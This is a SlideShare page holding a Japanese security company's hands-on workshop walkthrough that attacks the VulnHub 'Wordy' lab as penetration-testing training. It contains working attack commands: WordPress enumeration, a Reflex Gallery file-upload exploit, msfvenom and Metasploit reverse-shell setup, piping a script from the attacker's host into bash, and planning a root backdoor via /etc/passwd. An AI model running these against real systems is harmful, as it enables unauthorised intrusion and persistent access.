Google Container Engine (GKE) & Kubernetes のアーキテクチャ解説Google Container Engine (GKE) & Kubernetes のアーキテクチャ解説
Google Container Engine (GKE) & Kubernetes のアーキテクチャ解説
 
Docker実践入門
Docker実践入門Docker実践入門
Docker実践入門
 
Dockerクイックツアー
DockerクイックツアーDockerクイックツアー
Dockerクイックツアー
 
サーバ脆弱性スキャナ Vuls を OpenStack 環境で使ってみた
サーバ脆弱性スキャナ Vuls を OpenStack 環境で使ってみたサーバ脆弱性スキャナ Vuls を OpenStack 環境で使ってみた
サーバ脆弱性スキャナ Vuls を OpenStack 環境で使ってみた
 

Recently uploaded

Service-introduction-materials-misorae-leadership
Service-introduction-materials-misorae-leadershipService-introduction-materials-misorae-leadership
Service-introduction-materials-misorae-leadership
Yasuyoshi Minehisa
 
UP103シリーズ パワーコメット ユニパー スライドレールタイプ 瓦揚げ機 ウインチ
UP103シリーズ パワーコメット ユニパー スライドレールタイプ 瓦揚げ機 ウインチUP103シリーズ パワーコメット ユニパー スライドレールタイプ 瓦揚げ機 ウインチ
UP103シリーズ パワーコメット ユニパー スライドレールタイプ 瓦揚げ機 ウインチ
ユニパー株式会社
 

Recently uploaded (6)

Service-introduction-materials-misorae-leadership
Service-introduction-materials-misorae-leadershipService-introduction-materials-misorae-leadership
Service-introduction-materials-misorae-leadership
 
ストックマーク株式会社がご提供しているAnews(エーニュース)概要紹介.pdf
ストックマーク株式会社がご提供しているAnews(エーニュース)概要紹介.pdfストックマーク株式会社がご提供しているAnews(エーニュース)概要紹介.pdf
ストックマーク株式会社がご提供しているAnews(エーニュース)概要紹介.pdf
 
シンフォニティ株式会社(SYMPHONITY , Inc.) 会社説明・人材採用資料
シンフォニティ株式会社(SYMPHONITY , Inc.) 会社説明・人材採用資料シンフォニティ株式会社(SYMPHONITY , Inc.) 会社説明・人材採用資料
シンフォニティ株式会社(SYMPHONITY , Inc.) 会社説明・人材採用資料
 
UP103シリーズ パワーコメット ユニパー スライドレールタイプ 瓦揚げ機 ウインチ
UP103シリーズ パワーコメット ユニパー スライドレールタイプ 瓦揚げ機 ウインチUP103シリーズ パワーコメット ユニパー スライドレールタイプ 瓦揚げ機 ウインチ
UP103シリーズ パワーコメット ユニパー スライドレールタイプ 瓦揚げ機 ウインチ
 
202405_VISIONARYJAPAN_engineerteam_entrancebook(ver2.1)
202405_VISIONARYJAPAN_engineerteam_entrancebook(ver2.1)202405_VISIONARYJAPAN_engineerteam_entrancebook(ver2.1)
202405_VISIONARYJAPAN_engineerteam_entrancebook(ver2.1)
 
20240427 zaim academy counseling lesson .pdf
20240427 zaim academy counseling lesson .pdf20240427 zaim academy counseling lesson .pdf
20240427 zaim academy counseling lesson .pdf
 

イエラエセキュリティMeet up 20210820

  • 1. © 2021 Ierae Security Inc. All Rights Reserved. 0 © 2021 Ierae Security Inc. All Rights Reserved. ハンズオン勉強会 2021年8月20日
  • 2. © 2021 Ierae Security Inc. All Rights Reserved. 1 • 講師の紹介 • OSINT PTとVulnHub • 攻撃者環境の構築 • 本日の攻撃対象 • Walkthrough: Wordy • チャレンジ問題 • チャレンジ問題 Writeup AGENDA
  • 3. © 2021 Ierae Security Inc. All Rights Reserved. 2 講師の紹介 講師の紹介
  • 4. © 2021 Ierae Security Inc. All Rights Reserved. 3 講師の紹介 Twitter: @kawakatz
  • 5. © 2021 Ierae Security Inc. All Rights Reserved. 4 OSINT PTとVulnHub OSINT PTとVulnHub
  • 6. © 2021 Ierae Security Inc. All Rights Reserved. 5 OSINT PTとVulnHub  管理アセット(ドメイン・ネットワーク)の調査  サブドメイン探索  利用SaaSの特定  ポートスキャン  各サービスへの調査  認証情報の探索  Google検索  etc...  Webアプリケーションへの攻撃  既知の脆弱性の悪用  認証試行  0dayの調査  etc...  権限昇格  横展開  etc...  エントリーポイント候補の洗い出し  エントリーポイントへの侵入に向けた情報収集  フィッシング
  • 7. © 2021 Ierae Security Inc. All Rights Reserved. 6 OSINT PTとVulnHub  管理アセット(ドメイン・ネットワーク)の調査  サブドメイン探索  利用SaaSの特定  ポートスキャン  各サービスへの調査  認証情報の探索  Google検索  etc...  Webアプリケーションへの攻撃  既知の脆弱性の悪用  認証試行  0dayの調査  etc...  権限昇格  横展開  etc...  エントリーポイント候補の洗い出し  エントリーポイントへの侵入に向けた情報収集  フィッシング
  • 8. © 2021 Ierae Security Inc. All Rights Reserved. 7 攻撃者環境の構築 攻撃者環境の構築
  • 9. © 2021 Ierae Security Inc. All Rights Reserved. 8 攻撃者環境の構築(Kali Linux) sudo su passwd  rootユーザの有効化
  • 10. © 2021 Ierae Security Inc. All Rights Reserved. 9 本日の攻撃対象 本日の攻撃対象
  • 11. © 2021 Ierae Security Inc. All Rights Reserved. 10 本日の攻撃対象  HA: WORDY URL:https://www.vulnhub.com/entry/ha-wordy,363/ 目標:サーバのroot権限を奪取する
  • 12. © 2021 Ierae Security Inc. All Rights Reserved. 11 本日の攻撃対象  関連サービス  Hack The Box (https://www.hackthebox.eu/) Boxと呼ばれるサーバを攻略しながら、PTの基礎的な攻撃手法を学ぶことができるサービス。 Boxは定期的に入れ替わるため、新しいBoxに挑戦し続けることができる。 Challengeと呼ばれるCTF系の問題も多数存在している。
  • 13. © 2021 Ierae Security Inc. All Rights Reserved. 12 本日の攻撃対象  関連サービス  TryHackMe (https://tryhackme.com/) Hack The Boxと似ているが、テーマごとに分けて学習を進めることができる。
  • 14. © 2021 Ierae Security Inc. All Rights Reserved. 13 本日の攻撃対象  関連サービス  OSCP (https://www.offensive-security.com/pwk-oscp/、https://ierae.co.jp/lp/ierae-academy/#course1) Offensive Security社が提供する実践的なPTの資格。
  • 15. © 2021 Ierae Security Inc. All Rights Reserved. 14 本日の攻撃対象  関連サービス  OSCP (https://www.offensive-security.com/pwk-oscp/、https://ierae.co.jp/lp/ierae-academy/#course1) Offensive Security社が提供する実践的なPTの資格。
  • 16. © 2021 Ierae Security Inc. All Rights Reserved. 15 本日の攻撃対象  HA: WORDY URL:https://www.vulnhub.com/entry/ha-wordy,363/ 学びたい事  Nmapを用いたポートスキャン  Burp Suiteを用いたHTTP通信の確認  Dirsearchを用いたディレクトリ探索  WPScanを用いたWordPressに対する調査  Exploit Codeの理解・悪用  LinPEASを用いた権限昇格フローの調査  脆弱性の悪用方法の理解・悪用
  • 17. © 2021 Ierae Security Inc. All Rights Reserved. 16 検証環境の設定 検証環境の設定
  • 18. © 2021 Ierae Security Inc. All Rights Reserved. 17 検証環境の設定  前提条件 VirtualBoxにKali LinuxとWordyがインポートされていること  VirtualBoxのNW設定 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 19. © 2021 Ierae Security Inc. All Rights Reserved. 18 検証環境の設定  NATネットワークを用いた仮想マシン間通信の実現 ここでは、VirtualBoxのNATネットワークを用いて、Kali LinuxとWordy間の通信を実現させます。 ファイル > 環境設定 > ネットワーク > +マーク  VirtualBoxのNW設定 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 20. © 2021 Ierae Security Inc. All Rights Reserved. 19 検証環境の設定  NATネットワークを用いた仮想マシン間通信の実現 各仮想マシンのアダプタとして、先ほど作成したネットワークを用いてNATネットワークを指定します。  VirtualBoxのNW設定 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 21. © 2021 Ierae Security Inc. All Rights Reserved. 20 検証環境の設定  NATネットワークを用いた仮想マシン間通信の実現 2つの仮想マシンを起動します。 Kali Linux側でifconfigコマンドを実行すると、10.0.2.0/24内のIPアドレスが付与されていることが確認できます。  VirtualBoxのNW設定 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 22. © 2021 Ierae Security Inc. All Rights Reserved. 21 検証環境の設定  ホストオンリーアダプタを用いた仮想マシン間通信の実現 netdiscoverコマンドを用いて、指定したIPレンジ内に存在するホストを列挙します。 netdiscover –r 10.0.2.0/24 ※ X.X.X.1のIPアドレスは基本的にホストOSとなります。その他、対象のIPアドレスが1つに絞れない場合、ポート スキャンの段階まで各IPアドレスに実施していただいて問題ありません。  VirtualBoxのNW設定 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 23. © 2021 Ierae Security Inc. All Rights Reserved. 22 Walkthrough: Wordy Walkthrough: Wordy
  • 24. © 2021 Ierae Security Inc. All Rights Reserved. 23 Walkthrough: Wordy 目的:外部からアクセス可能なサービスの列挙  TCPのフルポートスキャン nmap <IP Address> -p- -sVC –n -p-: すべてのポートを対象として指定 -sVC (= -sV + -sC): 各サービスのバージョン特定を試行 + 各サービスに対して基礎的な情報収集スクリプトを実行 -n: 逆引きDNS解決を行わない  UDPのTOP1000ポートに対するスキャン nmap <IP Address> -sUVC –n -sU: UDPのポートスキャンを実施 URL:https://www.vulnhub.com/entry/ha-wordy,363/  Nmapを用いたポートスキャン
  • 25. © 2021 Ierae Security Inc. All Rights Reserved. 24 Walkthrough: Wordy 目的:外部からアクセス可能なサービスの列挙  TCPのフルポートスキャン nmap <IP Address> -p- -sVC –n -p-: すべてのポートを対象として指定 -sVC (= -sV + -sC): 各サービスのバージョン特定を試行 + 各サービスに対して基礎的な情報収集スクリプトを実行 -n: 逆引きDNS解決を行わない  UDPのTOP1000ポートに対するスキャン nmap <IP Address> -sUVC –n -sU: UDPのポートスキャンを実施 URL:https://www.vulnhub.com/entry/ha-wordy,363/  Nmapを用いたポートスキャン
  • 26. © 2021 Ierae Security Inc. All Rights Reserved. 25 Walkthrough: Wordy 目的:外部からアクセス可能なサービスの列挙  TCPのフルポートスキャン nmap <IPアドレス> -p- -sVC –n -p-: すべてのポートを対象として指定 -sVC (= -sV + -sC): 各サービスのバージョン特定を試行 + 各サービスに対して基礎的な情報収集スクリプトを実行 -n: 逆引きDNS解決を行わない  UDPのTOP1000ポートに対するスキャン nmap <IPアドレス> -sUVC –n -sU: UDPのポートスキャンを実施 URL:https://www.vulnhub.com/entry/ha-wordy,363/  Nmapを用いたポートスキャン
  • 27. © 2021 Ierae Security Inc. All Rights Reserved. 26 Walkthrough: Wordy 目的:HTTPリクエスト・レスポンスの確認 + 視覚的な調査 Project options > Misc > Embedded Browser > Allow the embedded browser to run without a sandbox. Proxy > Intercept > Open Browser URL:https://www.vulnhub.com/entry/ha-wordy,363/  Burp Suiteを用いたHTTP通信の確認
  • 28. © 2021 Ierae Security Inc. All Rights Reserved. 27 Walkthrough: Wordy 目的:HTTPリクエスト・レスポンスの確認 + 視覚的な調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/  Burp Suiteを用いたHTTP通信の確認
  • 29. © 2021 Ierae Security Inc. All Rights Reserved. 28 Walkthrough: Wordy 目的:HTTPリクエスト・レスポンスの確認 + 視覚的な調査 Proxy > HTTP history URL:https://www.vulnhub.com/entry/ha-wordy,363/  Burp Suiteを用いたHTTP通信の確認
  • 30. © 2021 Ierae Security Inc. All Rights Reserved. 29 Walkthrough: Wordy 目的:HTTPリクエスト・レスポンスの確認 + 視覚的な調査  AQUATONE (https://github.com/michenriksen/aquatone)  EyeWitness (https://github.com/FortyNorthSecurity/EyeWitness) URL:https://www.vulnhub.com/entry/ha-wordy,363/  Burp Suiteを用いたHTTP通信の確認
  • 31. © 2021 Ierae Security Inc. All Rights Reserved. 30 Walkthrough: Wordy 目的:アクセス可能なURLの発見  Google検索 site:<ドメイン名>  Wayback Machine (https://web.archive.org/) URL:https://www.vulnhub.com/entry/ha-wordy,363/  Dirsearchを用いたディレクトリ探索
  • 32. © 2021 Ierae Security Inc. All Rights Reserved. 31 Walkthrough: Wordy 目的:アクセス可能なURLの発見  waybackurls (https://github.com/tomnomnom/waybackurls) Twitter: @TomNomNom waybackurls <ドメイン名>  getallurls (https://github.com/lc/gau) gau <ドメイン名> URL:https://www.vulnhub.com/entry/ha-wordy,363/  Dirsearchを用いたディレクトリ探索
  • 33. © 2021 Ierae Security Inc. All Rights Reserved. 32 Walkthrough: Wordy 目的:アクセス可能なURLの発見  Dirsearch (https://github.com/maurosoria/dirsearch) apt install dirsearch dirsearch –u <URL> (-w <Wordlist>) -w: 使用するワードリストを指定 (https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content/) URL:https://www.vulnhub.com/entry/ha-wordy,363/  Dirsearchを用いたディレクトリ探索
  • 34. © 2021 Ierae Security Inc. All Rights Reserved. 33 Walkthrough: Wordy 目的:アクセス可能なURLの発見  Dirsearch (https://github.com/maurosoria/dirsearch) apt install dirsearch dirsearch –u <URL> (-w <Wordlist>) -w: 使用するワードリストを指定 (https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content/) URL:https://www.vulnhub.com/entry/ha-wordy,363/  Dirsearchを用いたディレクトリ探索
  • 35. © 2021 Ierae Security Inc. All Rights Reserved. 34 Walkthrough: Wordy 目的:アクセス可能なURLの発見  Dirsearchを用いたディレクトリ探索
  • 36. © 2021 Ierae Security Inc. All Rights Reserved. 35 Walkthrough: Wordy 目的:アクセス可能なURLの発見  Dirsearchを用いたディレクトリ探索
  • 37. © 2021 Ierae Security Inc. All Rights Reserved. 36 Walkthrough: Wordy 目的:アクセス可能なURLの発見  Wappalyzer (https://www.wappalyzer.com/)  Dirsearchを用いたディレクトリ探索
  • 38. © 2021 Ierae Security Inc. All Rights Reserved. 37 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) API Tokenがあるとなおよし URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
  • 39. © 2021 Ierae Security Inc. All Rights Reserved. 38 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) http://192.168.43.13/wordpress/?author=1 -> http://192.168.43.13/wordpress/index.php/author/admin/ URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
  • 40. © 2021 Ierae Security Inc. All Rights Reserved. 39 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) -eオプションについて URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
  • 41. © 2021 Ierae Security Inc. All Rights Reserved. 40 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) wpscan --url http://<IP Address>/wordpress --enumerate (--api-token <API Token>) URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
  • 42. © 2021 Ierae Security Inc. All Rights Reserved. 41 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) wpscan --url http://192.168.43.13/wordpress --enumerate (--api-token <API Token>) URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
  • 43. © 2021 Ierae Security Inc. All Rights Reserved. 42 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) wpscan --url http://192.168.43.13/wordpress --enumerate (--api-token <API Token>) URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
  • 44. © 2021 Ierae Security Inc. All Rights Reserved. 43 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) wpscan --url http://192.168.43.13/wordpress –enumerate ap (--plugins-detection aggressive) URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
  • 45. © 2021 Ierae Security Inc. All Rights Reserved. 44 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) wpscan --url http://192.168.43.13/wordpress –enumerate ap (--plugins-detection aggressive) URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
  • 46. © 2021 Ierae Security Inc. All Rights Reserved. 45 Walkthrough: Wordy 目的:WordPress固有の問題の調査  WPScan (https://wpscan.com) wpscan --url http://192.168.43.13/wordpress –enumerate ap (--plugins-detection aggressive) searchsploit reflex gallery URL:https://www.vulnhub.com/entry/ha-wordy,363/  WPScanを用いたWordPressに対する調査
  • 47. © 2021 Ierae Security Inc. All Rights Reserved. 46 休憩(5分) 休憩(5分)
  • 48. © 2021 Ierae Security Inc. All Rights Reserved. 47 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) searchsploit -m 36374 cat 36374.txt  Exploit Codeの理解・悪用
  • 49. © 2021 Ierae Security Inc. All Rights Reserved. 48 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) vim exploit.html python3 –m http.server 80 echo "<?php phpinfo(); ?>" > phpinfo.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
  • 50. © 2021 Ierae Security Inc. All Rights Reserved. 49 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード -> http://<IP Address>/wordpress/wp-content/uploads/2015/03/phpinfo.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
  • 51. © 2021 Ierae Security Inc. All Rights Reserved. 50 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード -> http://<IP Address>/wordpress/wp-content/uploads/2015/03/phpinfo.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
  • 52. © 2021 Ierae Security Inc. All Rights Reserved. 51 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード -> http://<IP Address>/wordpress/wp-content/uploads/2015/03/phpinfo.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
  • 53. © 2021 Ierae Security Inc. All Rights Reserved. 52 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) vim exploit.html URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
  • 54. © 2021 Ierae Security Inc. All Rights Reserved. 53 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード(再チャレンジ) -> http://<IP Address>/wordpress/wp-content/uploads/2021/08/phpinfo.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
  • 55. © 2021 Ierae Security Inc. All Rights Reserved. 54 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード(再チャレンジ) -> http://<IP Address>/wordpress/wp-content/uploads/2021/08/phpinfo.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
  • 56. © 2021 Ierae Security Inc. All Rights Reserved. 55 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374) http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード(再チャレンジ) -> http://<IP Address>/wordpress/wp-content/uploads/2021/08/phpinfo.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
  • 57. © 2021 Ierae Security Inc. All Rights Reserved. 56 Walkthrough: Wordy 目的:脆弱性の悪用  Reverse Shell とは 攻撃対象のサーバから攻撃者のサーバ(C2サーバ)に接続し、遠隔操作を可能にすること  Exploit Codeの理解・悪用 ① 脆弱性を悪用した攻撃 ② C2サーバへ接続 ③ C2サーバ越しに遠隔操作 C2サーバ 攻撃対象サーバ
  • 58. © 2021 Ierae Security Inc. All Rights Reserved. 57 Walkthrough: Wordy 目的:脆弱性の悪用  Reverse Shell とは 攻撃対象のサーバから攻撃者のサーバ(C2サーバ)に接続し、遠隔操作を可能にすること  Exploit Codeの理解・悪用 ① 脆弱性を悪用した攻撃 ② C2サーバへ接続 ③ C2サーバ越しに遠隔操作 C2サーバ 攻撃対象サーバ Kali Linux Wordy
  • 59. © 2021 Ierae Security Inc. All Rights Reserved. 58 Walkthrough: Wordy 目的:脆弱性の悪用  Metasploit Framework (https://www.metasploit.com/) msfvenom –l payload | grep php msfvenom -p php/reverse_php LHOST=<Kali's IP> LPORT=<Kali's Listen Port> -o shell.php URL:https://www.vulnhub.com/entry/ha-wordy,363/  Exploit Codeの理解・悪用
  • 60. © 2021 Ierae Security Inc. All Rights Reserved. 59 Walkthrough: Wordy 目的:脆弱性の悪用  Metasploit Framework (https://www.metasploit.com/) msfconsole  Exploit Codeの理解・悪用
  • 61. © 2021 Ierae Security Inc. All Rights Reserved. 60 Walkthrough: Wordy 目的:脆弱性の悪用  Metasploit Framework (https://www.metasploit.com/) msf6 > use multi/handler msf6 > options  Exploit Codeの理解・悪用 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 62. © 2021 Ierae Security Inc. All Rights Reserved. 61 Walkthrough: Wordy 目的:脆弱性の悪用  Metasploit Framework (https://www.metasploit.com/) msf6 exploit(multi/handler) > set payload php/reverse_php msf6 exploit(multi/handler) > set LHOST <Kali's IP> msf6 exploit(multi/handler) > set LPORT <Kali's Listen Port> msf6 exploit(multi/handler) > run  Exploit Codeの理解・悪用 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 63. © 2021 Ierae Security Inc. All Rights Reserved. 62 Walkthrough: Wordy 目的:脆弱性の悪用  Metasploit Framework (https://www.metasploit.com/) http://127.0.0.1/exploit.htmlからshell.phpをサーバにアップロード(再チャレンジ) -> http://<IP Address>/wordpress/wp-content/uploads/2021/08/shell.php  Exploit Codeの理解・悪用
  • 64. © 2021 Ierae Security Inc. All Rights Reserved. 63 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)  Exploit Codeの理解・悪用
  • 65. © 2021 Ierae Security Inc. All Rights Reserved. 64 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809) msfconsole msf6 > search reflex gallery  Exploit Codeの理解・悪用 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 66. © 2021 Ierae Security Inc. All Rights Reserved. 65 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809) msf6 > use 0 msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > options msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOST <Wordy's IP> msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set TARGETURI /wordpress msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST <Kali's IP> msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LPORT <Kali's Listen Port> msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set Proxies http:127.0.0.1 msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > advanced msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set ReverseAllowProxy true msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > run  Exploit Codeの理解・悪用 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 67. © 2021 Ierae Security Inc. All Rights Reserved. 66 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)  Exploit Codeの理解・悪用 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 68. © 2021 Ierae Security Inc. All Rights Reserved. 67 Walkthrough: Wordy 目的:脆弱性の悪用  WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)  Exploit Codeの理解・悪用
  • 69. © 2021 Ierae Security Inc. All Rights Reserved. 68 休憩(5分) 休憩(5分)
  • 70. © 2021 Ierae Security Inc. All Rights Reserved. 69 Walkthrough: Wordy 目的:権限昇格フローの発見  LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh python3 –m http.server 80  LinPEASを用いた権限昇格フローの調査
  • 71. © 2021 Ierae Security Inc. All Rights Reserved. 70 Walkthrough: Wordy 目的:権限昇格フローの発見  PTY (pseudo terminal) 「擬似端末(ぎじたんまつ、英語: pseudo terminal)または疑似ターミナルとは、UNIXにおけるテキスト端末の擬似 デバイスのマスター・スレーブのペアである。仮想コンソール、端末装置、シリアルポートハードウェアなどを使用 しないテキスト端末のインターフェイスを提供する。これらのハードウェアの代わりに、擬似端末セッションの役割 をソフトウェア(プロセス)が代用する。例えば、SSHなどでログインするとこの端末に接続される。」 (引用元: https://ja.wikipedia.org/wiki/%E6%93%AC%E4%BC%BC%E7%AB%AF%E6%9C%AB) -> より扱いやすい + より見やすいTerminal meterpreter > shell python3 –c 'import pty; pty.spawn("/bin/bash")'  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 72. © 2021 Ierae Security Inc. All Rights Reserved. 71 Walkthrough: Wordy 目的:権限昇格フローの発見  LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) curl http://<Kali's IP>/linpeas.sh | bash wget http://<Kali's IP>/linpeas.sh chmod +x linpeas.sh ./linpeas.sh  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 73. © 2021 Ierae Security Inc. All Rights Reserved. 72 Walkthrough: Wordy 目的:権限昇格フローの発見  LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) curl http://<Kali's IP>/linpeas.sh | bash wget http://<Kali's IP>/linpeas.sh chmod +x linpeas.sh ./linpeas.sh  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 74. © 2021 Ierae Security Inc. All Rights Reserved. 73 Walkthrough: Wordy 目的:権限昇格フローの発見  LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) cat linpeas.sh | bash  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 75. © 2021 Ierae Security Inc. All Rights Reserved. 74 Walkthrough: Wordy 目的:権限昇格フローの発見  LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)  LinPEASを用いた権限昇格フローの調査
  • 76. © 2021 Ierae Security Inc. All Rights Reserved. 75 Walkthrough: Wordy 目的:権限昇格フローの発見  GTFOBins (https://gtfobins.github.io/)  LinPEASを用いた権限昇格フローの調査
  • 77. © 2021 Ierae Security Inc. All Rights Reserved. 76 Walkthrough: Wordy 目的:権限昇格フローの発見  GTFOBins (https://gtfobins.github.io/)  LinPEASを用いた権限昇格フローの調査
  • 78. © 2021 Ierae Security Inc. All Rights Reserved. 77 Walkthrough: Wordy 目的:権限昇格フローの発見  GTFOBins (https://gtfobins.github.io/) cp wget -> SUID root権限で書き込み可能  LinPEASを用いた権限昇格フローの調査
  • 79. © 2021 Ierae Security Inc. All Rights Reserved. 78 Walkthrough: Wordy 目的:権限昇格フローの発見  GTFOBins (https://gtfobins.github.io/) cp wget -> SUID root権限で書き込み可能  LinPEASを用いた権限昇格フローの調査 /etc/passwdを書き換えよう!
  • 80. © 2021 Ierae Security Inc. All Rights Reserved. 79 Walkthrough: Wordy 目的:権限昇格フローの発見  /etc/passwdの書き換え ここでは、backdoorとなる管理者ユーザを追加します。 まず、/etc/passwdからrootユーザの行をpasswdファイルの形式と照らし合わせながら見ていきます。 <UserName>:<Password Hash>:<User ID>:<Group ID>:<Comment>:<Home Directory>:<Login Shell> root:x:0:0:root:/root:/bin/bash ※ Password Hashに「x」と指定されている場合、ハッシュ値は/etc/shadowファイル内で定義されています。 rootユーザの行をベースにbackdoorとなるユーザの行を作成していきます。  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
  • 81. © 2021 Ierae Security Inc. All Rights Reserved. 80 Walkthrough: Wordy 目的:権限昇格フローの発見  /etc/passwdの書き換え ユーザ名とパスワードのハッシュのみを書き換えれば良いため、指定するパスワードハッシュを生成します。 パスワードハッシュは以下の形式になっており、idの値によってハッシュアルゴリズムを特定することができます。 $id$salt$hash 1: MD5 5: SHA256 6: SHA512  LinPEASを用いた権限昇格フローの調査 URL:https://www.vulnhub.com/entry/ha-wordy,363/
